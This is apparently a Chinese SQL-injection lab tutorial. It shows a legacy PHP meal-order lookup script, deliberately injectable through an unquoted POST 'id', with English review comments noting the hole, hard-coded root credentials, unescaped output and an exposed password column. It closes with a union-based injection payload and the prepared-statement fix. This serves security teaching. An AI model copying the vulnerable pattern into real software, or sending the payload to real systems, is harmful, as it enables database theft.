下面贴出存在 SQL 注入漏洞的 PHP 代码:
<html>
<body>
<?php
// Looks up rows of table `zhuru` in database `test` by the POSTed `id` and
// renders them as an HTML table. The query is built by string interpolation
// from raw request data, which makes this script injectable.
//
// NOTE(review): the mysql_* functions (ext/mysql) were deprecated in PHP 5.5
// and removed in PHP 7.0, so this script only runs on legacy PHP. The
// connection also uses hard-coded root/root credentials; an application
// account limited to the privileges it needs would reduce the impact of any
// injected statement.
$con = mysql_connect("localhost","root","root");
if (!$con)
{
// NOTE(review): the raw driver error is sent to the client; log it
// server-side and show a generic message instead.
die('Could not connect: ' . mysql_error());
}
else
{
mysql_select_db("test");
// Untrusted input: taken from the request body with no validation or cast.
$id = $_POST['id'];
// Injection point: $id is interpolated unquoted into the SQL text, so any
// SQL fragment sent in `id` becomes part of the statement.
// Fix: bind the id as a parameter of a prepared statement (PDO or mysqli),
// or at minimum reject non-integer input before building the query.
$query ="select * from zhuru where Id=$id";
// NOTE(review): the return value of mysql_query() is not checked before it
// is passed to the fetch/num_rows calls below.
$result = mysql_query($query);
$info= mysql_fetch_array($result);
// $re_num is assigned but not read anywhere in this script.
$re_num = mysql_num_rows($result);
// mysql_fetch_array() returns FALSE when there is no row; the loose `==`
// also matches other falsy values.
if($info==FALSE)
{
echo "抱歉,您的订餐信息没有查到!";
}
else
{
echo "<form action='index.php' method='post' name='chakanform'>";
echo "<table>";
echo "<tr>";
echo "<h3>你的订餐记录是:</h3>";
echo "</tr>";
// Header row: emits 8 cells, while each data row below emits only 6.
echo "<tr>";
echo "<td>";
echo "序号:";
echo "</td>";
echo "<td>";
echo "菜品:";
echo "</td>";
echo "<td>";
echo "订餐时间";
echo "</td>";
echo "<td>";
echo "订餐时间";
echo "</td>";
echo "<td>";
echo "订餐时间";
echo "</td>";
echo "<td>";
echo "订餐时间";
echo "</td>";
echo "<td>";
echo "订餐时间";
echo "</td>";
echo "<td>";
echo "订餐时间";
echo "</td>";
echo "</tr>";
// do/while because the first row was already fetched into $info above.
do
{
// $xuhao (row counter) is never initialised; the first increment relies on
// an undefined variable becoming 1.
$xuhao++;
echo "<tr>";
echo "<td>";
echo $xuhao;
echo "</td>";
// NOTE(review): the array keys below are bare words, not quoted strings;
// legacy PHP treats them as strings with a notice, PHP 8 raises an Error.
// Every column value is echoed without htmlspecialchars(), so whatever the
// query returns (stored data or values supplied through the injectable
// query) reaches the page as raw HTML. The `password` column is also
// written to the response.
echo "<td>";
echo $info[username];
echo "</td>";
echo "<td>";
echo $info[password];
echo "</td>";
echo "<td>";
echo $info[id];
echo "</td>";
echo "<td>";
echo $info[tushu];
echo "</td>";
echo "<td>";
echo $info[dizhi];
echo "</td>";
echo "</tr>";
}
// `@` suppresses any warning raised by the fetch, hiding query failures.
while($info= @mysql_fetch_array($result));
echo "</table>";
echo "</form>";
}
mysql_close($con);
}
?>
</body>
</html>
注意添加消息头,配置如上;然后将请求正文(POST body)的内容修改为:
id=1 and 1=2 union select 1,2,3,4,database()
进行注入即可。原因是 $id 未经任何校验就被直接拼接进 SQL 语句,union 查询的结果(当前数据库名)会回显在结果表格中;修复方法是改用预处理语句并绑定参数,或先把 id 校验为整数。